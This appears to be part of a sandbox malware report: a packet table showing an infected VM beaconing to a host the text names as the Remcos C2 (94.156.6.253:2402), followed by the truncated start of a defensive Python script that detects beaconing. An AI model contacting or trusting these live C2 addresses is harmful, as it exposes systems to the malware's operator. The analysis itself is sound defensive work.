                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358223915 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358302116 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358347893 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358397961 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358408928 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358450890 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358491898 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358522892 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358620882 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358673096 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358685970 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358743906 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358829021 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358838081 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358912945 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358946085 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.358998060 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359061956 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359077930 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359122038 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359215021 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359288931 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359328032 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359379053 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359421968 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359482050 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359500885 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359591007 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359618902 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359657049 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359664917 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359739065 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.359752893 CEST24025003894.156.6.253192.168.11.20
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Oct 23, 2023 20:39:48.359829903 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.359850883 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.359926939 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.359934092 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360012054 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360055923 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360104084 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360167027 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360261917 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360270023 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360311031 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360366106 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360414982 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360475063 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360552073 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360582113 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360603094 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360616922 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360630035 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360631943 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360644102 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360657930 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360671043 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360685110 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360697031 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360697985 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360713005 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360766888 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360770941 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360771894 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360771894 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360774994 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360778093 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360791922 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360805035 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360819101 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360892057 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.360935926 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360939026 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360939980 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360939980 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360940933 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360941887 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360941887 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360943079 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360943079 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360944986 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360959053 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360972881 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.360986948 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361000061 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361008883 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.361013889 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361027956 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361084938 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361087084 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361088037 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361088037 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361092091 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361107111 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361119986 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361134052 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361148119 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361160994 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361175060 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361188889 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361202955 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361216068 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361217022 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.361229897 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361243963 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361257076 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361270905 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361284018 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361298084 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361310959 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361325026 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361339092 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361351967 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361366034 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361372948 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.361380100 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361393929 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361407042 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361421108 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361433983 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361448050 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361460924 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361474991 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361488104 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361501932 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361515999 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361529112 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361542940 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361556053 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.361557007 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361569881 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361583948 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361597061 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361610889 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361624002 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361638069 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361650944 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361665010 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361677885 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361677885 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.361691952 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.361882925 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.361932993 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.675709963 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.675935984 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.677521944 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677638054 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677694082 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677695036 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.677747011 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677779913 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.677800894 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677854061 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677901983 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.677963972 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.677963972 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.678133011 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.678133011 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.880953074 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.881234884 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.990412951 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.990489960 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.990701914 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.990701914 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.991816044 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.991955996 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.992043018 CEST  50038  2402  192.168.11.20  94.156.6.253
Oct 23, 2023 20:39:48.992116928 CEST  2402  50038  94.156.6.253  192.168.11.20
Oct 23, 2023 20:39:48.992208004 CEST  2402  50038  94.156.6.253  192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992238998 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992290974 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992296934 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992372990 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992449999 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992533922 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992594957 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992619991 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992646933 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992703915 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992758036 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992810965 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992865086 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992938995 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.992996931 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:48.993145943 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.039784908 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307353020 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307470083 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307547092 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307605028 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307660103 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307713032 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307765961 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307771921 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307771921 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307820082 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307873964 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307929993 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.307979107 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.308072090 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:49.308123112 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.277792931 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.277889967 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592107058 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592206001 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592247963 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592284918 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592331886 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592514038 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.592567921 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.906481981 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.906548023 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.910350084 CEST24025003894.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:53.910553932 CEST500382402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:39:54.820475101 CEST805003677.238.121.250192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:39:54.820775986 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:40:08.703746080 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:40:08.730237961 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:40:09.099946022 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:40:38.717533112 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:40:38.719626904 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:40:39.099987030 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:41:08.737397909 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:41:08.739684105 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:41:09.115681887 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:41:30.439802885 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:41:30.439804077 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:41:31.220779896 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:41:31.423870087 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:41:32.782917976 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:41:33.360930920 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:41:35.891735077 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:41:37.235120058 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:41:38.753271103 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:41:38.755230904 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:41:39.131377935 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:41:42.093370914 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:41:44.983496904 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:41:54.497091055 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:42:00.480206966 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:42:08.763279915 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:42:08.765372992 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:42:09.131537914 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:42:19.304114103 CEST5003980192.168.11.20178.237.33.50
                                                                                                                                                                                                        Oct 23, 2023 20:42:31.457763910 CEST5003680192.168.11.2077.238.121.250
                                                                                                                                                                                                        Oct 23, 2023 20:42:38.787746906 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:42:38.789805889 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:42:39.163062096 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:43:08.815100908 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:43:08.817039967 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:43:09.178564072 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:43:38.825777054 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:43:38.827780962 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:43:39.194225073 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:44:08.840158939 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:44:08.842094898 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:44:09.209702015 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:44:38.857065916 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:44:38.898822069 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:44:38.907484055 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:44:39.272411108 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:45:08.874274015 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:45:08.876455069 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:45:09.241103888 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:45:38.890280008 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:45:38.892127037 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:45:39.256853104 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:46:08.903547049 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:46:08.905333996 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:46:09.272595882 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:46:38.919866085 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:46:38.921597958 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:46:39.303858042 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:47:08.934426069 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:47:08.936155081 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:47:09.303888083 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:47:38.965740919 CEST24025003794.156.6.253192.168.11.20
                                                                                                                                                                                                        Oct 23, 2023 20:47:38.967350006 CEST500372402192.168.11.2094.156.6.253
                                                                                                                                                                                                        Oct 23, 2023 20:47:39.335249901 CEST24025003794.156.6.253192.168.11.20
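In the rows above, the 94.156.6.253:2402 traffic (the port the report lists for the Remcos C2) recurs in small bursts at roughly 30-second spacing, while the port 80 rows to 178.237.33.50 and 77.238.121.250 repeat at growing gaps. The script below is an added example, not part of the Joe Sandbox report: it groups packets by remote endpoint, collapses each keepalive-plus-ACK burst into one beat, and scores each flow for a fixed period using the median interval and its median absolute deviation. ROWS is transcribed from the table (a few of the port 2402 beats and the 178.237.33.50:80 rows); LOCAL_IP is the analysis VM address as it appears in the table; the 2 s burst gap, the minimum of 4 intervals and the 5 % jitter tolerance are assumed thresholds chosen for illustration.

```python
"""Periodicity (beaconing) check over sandbox TCP packet rows.

Added example, not part of the Joe Sandbox report. ROWS is transcribed from
the report's TCP table (timestamp, source port, destination port, source IP,
destination IP). LOCAL_IP is the analysis VM address seen in the table. The
burst gap, minimum sample count and jitter tolerance are assumed thresholds.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

LOCAL_IP = "192.168.11.20"  # analysis VM address, taken from the table

# Transcribed rows: six port 2402 beats (server packet, client reply, server
# packet) and the seven 178.237.33.50:80 packets.
ROWS = """\
Oct 23, 2023 20:40:08.703746080 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:40:08.730237961 CEST 50037 2402 192.168.11.20 94.156.6.253
Oct 23, 2023 20:40:09.099946022 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:40:38.717533112 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:40:38.719626904 CEST 50037 2402 192.168.11.20 94.156.6.253
Oct 23, 2023 20:40:39.099987030 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:41:08.737397909 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:41:08.739684105 CEST 50037 2402 192.168.11.20 94.156.6.253
Oct 23, 2023 20:41:09.115681887 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:41:38.753271103 CEST 2402 50037 94.156.6.253 192.168.11.20
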